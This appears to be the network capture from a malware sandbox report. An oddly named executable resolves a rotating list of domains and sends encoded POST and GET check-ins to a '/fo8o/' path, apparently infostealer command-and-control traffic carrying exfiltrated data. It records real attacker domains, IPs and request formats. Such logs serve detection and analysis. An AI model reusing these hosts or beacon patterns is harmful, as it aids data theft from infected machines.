Dec 6, 2024 17:43:36.707715034 CET | 192.168.2.9 | 1.1.1.1 | 0x9a5e | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:43:54.166193962 CET | 192.168.2.9 | 1.1.1.1 | 0x700e | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:44:02.664020061 CET | 192.168.2.9 | 1.1.1.1 | 0x86e7 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:44:18.070883989 CET | 192.168.2.9 | 1.1.1.1 | 0xdd20 | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:44:26.367794037 CET | 192.168.2.9 | 1.1.1.1 | 0xd3a6 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:45:41.275595903 CET | 192.168.2.9 | 1.1.1.1 | 0xa19e | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:45:56.289419889 CET | 192.168.2.9 | 1.1.1.1 | 0xe4db | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:04.602319956 CET | 192.168.2.9 | 1.1.1.1 | 0x508 | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:19.639329910 CET | 192.168.2.9 | 1.1.1.1 | 0xfc27 | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:35.087032080 CET | 192.168.2.9 | 1.1.1.1 | 0x2e6 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:43.431718111 CET | 192.168.2.9 | 1.1.1.1 | 0xd579 | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:51.727884054 CET | 192.168.2.9 | 1.1.1.1 | 0x6a38 | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:47:06.540668011 CET | 192.168.2.9 | 1.1.1.1 | 0x705d | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 17:43:01.612446070 CET | 1.1.1.1 | 192.168.2.9 | 0xfc0e | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:43:01.612446070 CET | 1.1.1.1 | 192.168.2.9 | 0xfc0e | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:43:37.474148989 CET | 1.1.1.1 | 192.168.2.9 | 0x9a5e | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:43:54.573400021 CET | 1.1.1.1 | 192.168.2.9 | 0x700e | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:44:03.442640066 CET | 1.1.1.1 | 192.168.2.9 | 0x86e7 | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:44:18.304300070 CET | 1.1.1.1 | 192.168.2.9 | 0xdd20 | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:44:26.843280077 CET | 1.1.1.1 | 192.168.2.9 | 0xd3a6 | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:44:26.843280077 CET | 1.1.1.1 | 192.168.2.9 | 0xd3a6 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:44:26.843280077 CET | 1.1.1.1 | 192.168.2.9 | 0xd3a6 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:45:41.638171911 CET | 1.1.1.1 | 192.168.2.9 | 0xa19e | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:45:56.527445078 CET | 1.1.1.1 | 192.168.2.9 | 0xe4db | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:05.286708117 CET | 1.1.1.1 | 192.168.2.9 | 0x508 | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:20.621354103 CET | 1.1.1.1 | 192.168.2.9 | 0xfc27 | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:46:20.621354103 CET | 1.1.1.1 | 192.168.2.9 | 0xfc27 | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:35.371536016 CET | 1.1.1.1 | 192.168.2.9 | 0x2e6 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:43.660933971 CET | 1.1.1.1 | 192.168.2.9 | 0xd579 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:46:52.226324081 CET | 1.1.1.1 | 192.168.2.9 | 0x6a38 | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:46:52.226324081 CET | 1.1.1.1 | 192.168.2.9 | 0x6a38 | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:47:06.772746086 CET | 1.1.1.1 | 192.168.2.9 | 0x705d | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      0 | 192.168.2.9 | 49782 | 154.215.72.110 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:43:37.605808973 CET | 506 | OUT | GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.3xfootball.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:43:39.115890980 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 06 Dec 2024 16:43:38 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      1 | 192.168.2.9 | 49844 | 116.50.37.244 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:44:03.566926003 CET | 789 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Ascii: LzY4r=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPyYiKB86lzcZkawPX4uYnbVGBZG
                                                                                      Dec 6, 2024 17:44:05.090445995 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Fri, 06 Dec 2024 16:44:04 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      2 | 192.168.2.9 | 49850 | 116.50.37.244 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:44:06.225018024 CET | 813 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Ascii: LzY4r=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwbyBmQuAZrjMnBXnCYa/BUCxqc6nQ==
                                                                                      Dec 6, 2024 17:44:07.748866081 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Fri, 06 Dec 2024 16:44:06 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      3 | 192.168.2.9 | 49856 | 116.50.37.244 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:44:08.879355907 CET | 1826 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Ascii: LzY4r= [TRUNCATED]
                                                                                      Dec 6, 2024 17:44:10.415050983 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Fri, 06 Dec 2024 16:44:09 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      4 | 192.168.2.9 | 49865 | 116.50.37.244 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:44:11.536209106 CET | 513 | OUT | GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:44:13.060348034 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Fri, 06 Dec 2024 16:44:11 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      5 | 192.168.2.9 | 49901 | 85.159.66.93 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:44:26.968638897 CET | 768 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Ascii: LzY4r=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R12CRarZebQ6qeGR6bsZV7uz5VCSf


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.9 | 49908 | 85.159.66.93 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:44:29.619647026 CET | 792 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Ascii: LzY4r=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5zeSlb3LDGM22Jo7TszxHPxvEeK5Q==


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      7 | 192.168.2.9 | 49915 | 85.159.66.93 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:44:32.277421951 CET | 1805 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 61 30 37 2b 45 6d 4b 50 33 48 63 2b 76 79 6b 44 69 48 6d 48 36 46 54 46 69 4a 4a 63 65 38 72 2b 51 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 34 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 [TRUNCATED]
                                                                                      Data Ascii: LzY4r=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 [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      8 | 192.168.2.9 | 49921 | 85.159.66.93 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:44:34.931458950 CET | 506 | OUT | GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.magmadokum.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:45:36.259124994 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      9 | 192.168.2.9 | 49983 | 91.195.240.94 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:45:41.765894890 CET | 771 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.rssnewscast.com
                                                                                      Origin: http://www.rssnewscast.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.rssnewscast.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 6f 39 38 51 63 4e 41 56 72 43 4d 46 39 71 6d 79 74 67 69 69 54 57 7a 56 31 67 5a 57
                                                                                      Data Ascii: LzY4r=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8o98QcNAVrCMF9qmytgiiTWzV1gZW
                                                                                      Dec 6, 2024 17:45:43.060255051 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                      date: Fri, 06 Dec 2024 16:45:42 GMT
                                                                                      content-type: text/html
                                                                                      content-length: 556
                                                                                      server: Parking/1.0
                                                                                      connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
